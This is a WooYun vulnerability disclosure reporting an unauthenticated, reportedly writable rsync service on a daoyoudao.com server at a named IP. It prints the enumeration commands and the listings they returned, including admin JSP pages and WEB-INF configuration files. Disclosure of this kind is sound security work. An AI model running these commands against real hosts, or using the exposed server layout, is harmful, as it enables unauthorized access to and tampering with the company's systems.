当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107720

漏洞标题:道有道某服务器未授权访问可上传文件

相关厂商:daoyoudao.com

漏洞作者: 几何黑店

提交时间:2015-04-15 09:38

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-15: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

道有道某服务器未授权访问可上传文件

详细说明:

211.144.132.51
开了rsync服务,873端口

root@kali:~# rsync -v 211.144.132.51::
Welcome to use  the rsync services!
terry          	terry 's directory from 10.172.0.201
youday         	youday 's directory from 10.172.0.201
pkgame-platform	pkgame-platform 's directory from 10.172.0.201
pkgame-union-images	pkgame-union-images
pkgame-placard-induct	pkgame-placard-induct
pkgame-placard 	pkgame-placard
dapp-pic       	dapp-pic
dapp-game      	dapp-game
dapp-app       	dapp-app
dapp-theme     	dapp-theme
dapp-special   	dapp-special
dapp-upload    	dapp-upload
dapp-js        	dapp-js
test           	test rsync
partner        	partner
partner_backup_20131017	partner_backup_20131017
tomcat-partner 	tomcat-partner
apk_package    	apk_package
apktool        	apktool
industry_cert  	industry_cert
industry_manage	industry_manage
industry_qy    	industry_qy
industry_iwei  	industry_iwei
industry_wap   	industry_wap
industry_yx    	industry_yx
industry_dining	industry_dining
industry_mb    	industry_mb
industry_sh2   	industry_sh2
tomcat-yx      	tomcat-yx
tomcat-dining  	tomcat-dining
tomcat-imanage 	tomcat-imanage
tomcat-mb      	tomcat-mb
tomcat-qy      	tomcat-qy
tomcat-iwei    	tomcat-iwei
tomcat-sh      	tomcat-sh
tomcat-wap     	tomcat-wap
tiger_test     	tomcat-wap_tiger
ios-res        	ios-res
industry_apk   	industry apk
industry_upload	industry upload
qy-log         	qy-log
adms-log       	adms-log
tomcat-poster  	tomcat-poster
industry_poster	industry_poster


多个管理系统,包含可写权限

漏洞证明:

Welcome to use  the rsync services!
receiving file list ... done
drwxr-xr-x       12288 2015/04/09 19:40:39 .
-rw-r--r--         372 2014/04/30 15:27:09 404.html
-rw-r--r--       27402 2014/04/30 15:27:12 404.png
-rw-r--r--       11841 2014/04/30 15:27:00 Copy of newOrder.jsp
-rw-r--r--        2820 2014/12/18 18:57:27 OtherOrderList.jsp
-rw-r--r--         189 2014/11/12 00:07:32 System.jsp
-rw-r--r--         187 2014/04/30 15:27:12 System1010.jsp
-rw-r--r--       10328 2014/12/24 20:04:06 accountConfirm.jsp
-rw-r--r--        8499 2014/09/18 19:05:25 accountConfirm1209.jsp
-rw-r--r--        8349 2014/12/09 18:10:36 accountConfirm1217.jsp
-rw-r--r--       10301 2014/12/24 10:43:31 accountConfirm122.jsp
-rw-r--r--       10275 2014/12/18 18:41:48 accountConfirm1224.jsp
-rw-r--r--        4911 2014/04/30 15:27:12 accountingStatement.jsp
-rw-r--r--        4071 2014/05/12 18:22:40 add.jsp
-rw-r--r--       11802 2014/05/12 18:22:40 addDocNot.jsp
-rw-r--r--       13011 2014/04/30 15:27:03 addDocument.jsp
-rw-r--r--        7278 2014/04/30 15:27:09 addIosAccount.jsp
-rw-r--r--        1730 2014/04/30 15:27:12 addLecturerAnnouncement.jsp
-rw-r--r--        5747 2014/04/30 15:27:19 addPartner.jsp
-rw-r--r--        6183 2014/04/30 15:27:09 addTenant.jsp
-rw-r--r--        4654 2014/04/30 15:27:09 addgood.jsp
-rw-r--r--        8653 2015/02/06 20:10:32 admin.jsp
-rw-r--r--        7763 2014/09/18 19:05:58 admin1217.jsp
-rw-r--r--        8593 2014/12/17 18:14:09 admin211.jsp
-rw-r--r--        3040 2014/09/25 22:08:48 adverDetailH.jsp
-rw-r--r--        3801 2014/04/30 15:27:12 advice.jsp
-rw-r--r--        3224 2014/04/30 15:27:09 adviceDetail.jsp
-rw-r--r--        2492 2014/04/30 15:27:18 adviceList.jsp
-rw-r--r--       11685 2014/12/24 18:41:16 appManagement.jsp
-rw-r--r--        1471 2014/03/25 18:04:30 appManagementList.jsp
-rw-r--r--       10272 2014/10/20 16:53:48 appcenter.jsp
-rw-r--r--       15251 2014/04/30 15:27:00 appendOrder.jsp
-rw-r--r--        1703 2014/04/30 15:27:04 areaStat.jsp
-rw-r--r--        5467 2014/04/30 15:27:12 auditCourseReservation.jsp
-rw-r--r--       10326 2014/04/30 15:27:09 basicInfo.jsp
-rw-r--r--        7631 2015/03/11 20:08:47 bdPartner.jsp
-rw-r--r--        4842 2015/03/11 20:08:39 bdorder.jsp
-rw-r--r--         956 2014/04/30 15:27:12 beep.jsp
-rw-r--r--         463 2014/04/30 15:27:04 bill.jsp
-rw-r--r--       13651 2015/01/14 18:17:51 billManage.jsp
-rw-r--r--       13661 2014/08/20 18:11:49 billManage114.jsp
-rw-r--r--        1521 2014/04/30 15:27:04 billSum.jsp
-rw-r--r--        3463 2014/04/30 15:27:12 canOrder.jsp
-rw-r--r--        3350 2014/04/30 15:27:19 cancellation.jsp
-rw-r--r--        9540 2015/02/03 15:00:43 chaBelong.jsp
-rw-r--r--        9495 2014/10/24 11:13:14 chaBelong0203.jsp
-rw-r--r--        8763 2014/08/14 11:02:54 chaBelong1024.jsp
-rw-r--r--        1701 2014/04/30 15:27:12 channelStat.jsp
-rw-r--r--      115002 2014/07/02 16:53:46 confirm.js
-rw-r--r--        4445 2014/04/30 15:27:09 courseReservation.jsp
-rw-r--r--        2911 2014/04/30 15:27:12 daoyoudao.html
-rw-r--r--       15104 2014/04/30 15:27:12 docProduct.jsp
-rw-r--r--        2216 2014/04/30 15:27:09 documentProduct.jsp
-rw-r--r--         242 2014/04/30 15:27:12 documentProductQ.jsp
-rw-r--r--        1266 2014/04/30 15:27:01 download.jsp
-rw-r--r--        7973 2014/09/18 19:11:45 engineer.jsp
-rw-r--r--        4068 2014/07/02 19:28:49 erpUser.jsp
-rw-r--r--        2681 2014/04/30 15:27:06 error.html
-rw-r--r--        1274 2014/04/30 15:27:18 extension.jsp
-rw-r--r--       48713 2014/11/11 23:54:02 fab.js
-rw-r--r--       24798 2014/11/20 15:35:33 fabBack.js
-rw-r--r--        5519 2014/11/27 17:24:06 fabBack.jsp
-rw-r--r--        4335 2014/11/12 20:11:32 fabBack1112.jsp
-rw-r--r--        4335 2014/11/12 20:57:53 fabBack1127.jsp
-rw-r--r--       96179 2015/03/11 20:09:56 fabBackDetail.jsp
-rw-r--r--       96459 2015/01/22 18:15:20 fabBackDetail0311.jsp
-rw-r--r--       95433 2014/11/14 09:44:19 fabBackDetail1119.jsp
-rw-r--r--       95447 2014/11/18 17:55:35 fabBackDetail122.jsp
-rw-r--r--        1279 2014/04/30 15:27:12 fabrication.jsp
-rw-r--r--        4473 2014/11/27 17:24:05 fabricationQuery.jsp
-rw-r--r--        2747 2014/04/30 15:27:03 fabricationQuery1127.jsp
-rw-r--r--        2721 2014/04/30 15:27:01 financial.jsp
-rw-r--r--         832 2014/04/30 15:27:09 findBalanceQ.jsp
-rw-r--r--        1624 2014/04/30 15:27:12 findDepositQ.jsp
-rw-r--r--         975 2014/04/30 15:27:01 findDocument.jsp
-rw-r--r--        2158 2014/04/30 15:27:12 findDocumentH.jsp
-rw-r--r--        1566 2014/04/30 15:27:06 findDownloadDocument.jsp
-rw-r--r--        2294 2014/04/30 15:27:09 findHNotice.jsp
-rw-r--r--        2585 2014/04/30 15:27:09 findOrderQ.jsp
-rw-r--r--        1628 2014/04/30 15:27:09 findOtherAcc.jsp
-rw-r--r--        1110 2014/04/30 15:27:04 findQNotice.jsp
-rw-r--r--        1194 2014/04/30 15:27:12 findSalesPromotionQ.jsp
-rw-r--r--        2596 2014/05/12 18:22:40 findall.jsp
-rw-r--r--       12359 2014/04/30 15:27:03 footer.jsp
-rw-r--r--        2265 2014/04/30 15:27:09 freePeriodMaintain.jsp
-rw-r--r--        2457 2014/04/30 15:27:09 getPartner.jsp
-rw-r--r--         823 2014/04/30 15:27:12 goodsList.jsp
-rw-r--r--       10433 2014/04/30 15:27:09 grant.jsp
-rw-r--r--        7576 2014/12/04 10:58:34 head.jsp
-rw-r--r--        7441 2014/04/30 15:27:09 head627.jsp
-rw-r--r--        3293 2014/04/30 15:27:09 head_BF.jsp
-rw-r--r--        1759 2014/04/30 15:27:09 home.jsp
-rw-r--r--        4227 2014/12/03 19:33:26 ilogin.html
-rw-r--r--        3365 2014/04/30 15:27:04 index.jsp
-rw-r--r--       10260 2014/04/30 15:27:04 industrialOrder.jsp
-rw-r--r--         936 2014/04/30 15:27:04 iosAccountQ.jsp
-rw-r--r--        6291 2014/04/30 15:27:12 iosApplication.jsp
-rw-r--r--        2250 2015/03/11 20:12:46 iosaccount.jsp
-rw-r--r--        2676 2014/04/30 15:27:03 keywordsDictionary.jsp
-rw-r--r--        2043 2014/04/30 15:27:03 lecturerAnnouncement.jsp
-rw-r--r--        3824 2014/04/30 15:27:09 lecturerResource.jsp
-rw-r--r--        4517 2014/04/30 15:27:12 login11.html
-rw-r--r--        4517 2014/04/30 15:27:12 login_backs.html
-rw-r--r--         654 2014/04/30 15:27:01 logout.jsp
-rw-r--r--       12321 2014/11/27 17:24:05 maildetail.jsp
-rw-r--r--       12130 2014/10/15 20:54:24 maildetail1127.jsp
-rw-r--r--       54919 2015/01/14 18:17:51 manageDetail.jsp
-rw-r--r--       54867 2014/07/02 19:28:52 manageDetail114.jsp
-rw-r--r--        1203 2014/04/30 15:27:01 monthBill.jsp
-rw-r--r--        4712 2014/04/30 15:27:12 newAdmin.jsp
-rw-r--r--       24336 2014/06/10 17:26:44 newOrder.jsp
-rw-r--r--        6695 2014/04/30 15:27:03 newTenant.jsp
-rw-r--r--        2208 2014/05/13 18:53:22 noticeXQ.jsp
-rw-r--r--      110146 2014/07/02 17:04:24 order.js
-rw-r--r--       12086 2014/04/30 15:27:12 order.jsp
-rw-r--r--        8756 2014/04/30 15:27:09 orderBasicInfo.jsp
-rw-r--r--       79593 2015/04/09 18:18:30 orderDetail.jsp
-rw-r--r--       79197 2015/01/29 16:38:29 orderDetail0311.jsp
-rw-r--r--       77429 2014/10/27 14:22:50 orderDetail1119.jsp
-rw-r--r--       77935 2014/11/20 12:09:59 orderDetail1127.jsp
-rw-r--r--       78254 2014/12/04 18:19:25 orderDetail113.jsp
-rw-r--r--       78266 2015/01/13 17:54:33 orderDetail122.jsp
-rw-r--r--        7927 2014/10/16 11:14:00 orderIliveList.jsp
-rw-r--r--        7723 2014/09/03 19:08:41 orderIliveList1014.jsp
-rw-r--r--       18923 2015/02/04 09:49:58 orderManage.jsp
-rw-r--r--       18513 2014/11/27 18:04:38 orderManage112.jsp
-rw-r--r--       18509 2014/06/26 20:30:48 orderManage1127.jsp
-rw-r--r--         423 2014/04/30 15:27:09 orderState.jsp
-rw-r--r--        1395 2014/04/30 15:27:01 outstanding.jsp
-rw-r--r--        2657 2014/04/30 15:27:09 parUserList.jsp
-rw-r--r--         819 2014/04/30 15:27:12 partnerSystemPackage.jsp
-rw-r--r--        1023 2014/04/30 15:27:09 partnersPerformance.jsp
-rw-r--r--          77 2014/04/30 15:27:09 popup.jsp
-rw-r--r--        1184 2014/04/30 15:27:12 portalSoftware.jsp
-rw-r--r--        1588 2014/04/30 15:27:06 productApplyAll.jsp
-rw-r--r--        2445 2014/04/30 15:27:00 productApplyAllH.jsp
-rw-r--r--        4366 2014/04/30 15:27:06 productapp.jsp
-rw-r--r--       20338 2014/04/30 15:27:04 productapply.jsp
-rw-r--r--        1907 2014/04/30 15:27:18 productpage.jsp
-rw-r--r--       21022 2014/04/30 15:27:09 productsale.jsp
-rw-r--r--        9430 2015/01/14 18:17:51 publishD.jsp
-rw-r--r--        9302 2014/04/30 15:27:04 publishD114.jsp
-rw-r--r--        3313 2014/04/30 15:27:09 reportMaintenance.jsp
-rw-r--r--          25 2014/07/02 12:04:20 robots.txt
-rw-r--r--        1498 2014/04/30 15:27:12 scalePartner.jsp
-rw-r--r--         499 2014/10/10 11:50:56 shutdown.jsp
-rw-r--r--       14186 2015/03/11 20:29:06 specialconf.jsp
-rw-r--r--       13969 2015/02/11 18:10:57 specialconf0311.jsp
-rw-r--r--       13952 2014/10/14 18:27:50 specialconf211.jsp
-rw-r--r--        9842 2014/07/10 19:08:48 specifyProducer.jsp
-rw-r--r--         980 2014/04/30 15:27:12 ssysAuth.jsp
-rw-r--r--         890 2014/04/30 15:27:12 sysAuth.jsp
-rw-r--r--        2724 2014/04/30 15:27:09 sysUser.jsp
-rw-r--r--         823 2014/04/30 15:27:04 updateNotice.jsp
-rw-r--r--         864 2014/04/30 15:27:09 weihu.html
-rw-r--r--        5017 2014/04/30 15:27:09 weihu.jsp
-rw-r--r--        2057 2014/11/11 19:53:10 welcome.jsp
drwxr-xr-x        4096 2014/04/30 15:27:09 META-INF
drwxr-xr-x        4096 2015/04/09 19:40:20 WEB-INF
drwxr-xr-x        4096 2014/04/30 15:27:12 amcharts
drwxr-xr-x        4096 2014/04/30 15:27:12 attached
drwxr-xr-x        4096 2014/10/17 18:39:32 css
drwxr-xr-x        4096 2015/03/31 19:30:33 detail
drwxr-xr-x        4096 2015/01/14 18:29:04 financial
drwxr-xr-x        4096 2015/03/31 20:21:06 home
drwxr-xr-x        4096 2014/11/27 18:35:27 ilive
drwxr-xr-x        4096 2015/03/11 20:10:18 images
drwxr-xr-x        4096 2014/04/30 15:27:12 jquery-easyui-1.3.5
drwxr-xr-x        4096 2014/04/30 15:27:12 jquery-ui
drwxr-xr-x        4096 2015/03/31 19:28:48 js
drwxr-xr-x        4096 2014/04/30 15:27:19 kindeditor
drwxr-xr-x        4096 2014/04/30 15:27:06 lecturer
drwxr-xr-x        4096 2014/04/30 15:27:09 lg_images
drwxr-xr-x        4096 2014/04/30 15:27:12 lg_js
drwxr-xr-x        4096 2014/04/30 15:27:12 lg_style
drwxr-xr-x        4096 2014/04/30 15:27:04 lib
drwxr-xr-x        4096 2014/04/30 15:27:09 manage
drwxr-xr-x        4096 2014/04/30 15:27:09 newStyle
drwxr-xr-x        4096 2014/04/30 15:27:18 news
drwxr-xr-x        4096 2015/03/04 10:36:29 order
drwxr-xr-x        4096 2014/04/30 15:27:18 phonePartner
drwxr-xr-x        4096 2014/11/27 18:49:43 product
drwxr-xr-x        4096 2014/09/11 20:30:14 style
drwxr-xr-x        4096 2014/04/30 15:27:09 tenant
drwxr-xr-x        4096 2014/04/30 15:27:09 uploadify-v3.1


root@kali:~# rsync -v 211.144.132.51::partner/WEB-INF/classes/
Welcome to use  the rsync services!
receiving file list ... done
drwxr-xr-x        4096 2015/03/31 18:50:50 .
-rw-r--r--        7237 2015/01/05 21:33:51 applicationContext.xml
-rw-r--r--        6758 2015/04/09 19:11:20 applicationContext_timer.xml
-rw-r--r--        4317 2014/12/24 19:05:55 applicationContext_timer11.xml
-rw-r--r--        4179 2014/07/14 17:55:26 applicationContext_timer1124.xml
-rw-r--r--        4317 2015/01/05 17:58:19 applicationContext_timer211.xml
-rw-r--r--        5136 2015/02/11 19:52:21 applicationContext_timer331.xml
-rw-r--r--        3472 2014/05/12 18:22:40 applicationContext_timer626.xml
-rw-r--r--         770 2014/04/29 11:29:40 log4j.properties
-rw-r--r--         853 2015/04/09 18:22:13 properties.properties
-rw-r--r--         865 2015/03/30 17:59:50 properties0330.properties
-rw-r--r--         627 2014/08/13 14:48:07 properties1027.properties
-rw-r--r--         627 2014/08/13 14:48:07 properties1030.properties
-rw-r--r--        3736 2014/07/30 10:07:32 struts.xml
drwxr-xr-x        4096 2014/04/30 15:27:18 com
sent 19 bytes  received 444 bytes  308.67 bytes/sec
total size is 42894  speedup is 92.64

修复方案:

加密码

版权声明:转载请注明来源 几何黑店@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-20 14:22

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无